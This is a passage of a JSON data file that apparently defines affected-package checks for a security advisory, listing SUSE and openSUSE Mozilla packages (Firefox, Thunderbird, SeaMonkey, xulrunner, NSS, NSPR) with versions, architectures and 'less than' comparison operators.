"mozilla-xulrunner192-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libsoftokn3-3.12.8-1.1.1.i586.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-64bit-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-64bit-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-certs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "libfreebl3-64bit-3.12.8-1.1.1.ppc.rpm", "packageName": "libfreebl3-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-translations-other-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE 